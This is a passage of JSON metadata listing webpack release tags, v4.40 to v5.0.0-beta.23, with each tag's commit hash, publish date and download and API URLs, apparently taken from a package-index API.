c79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webp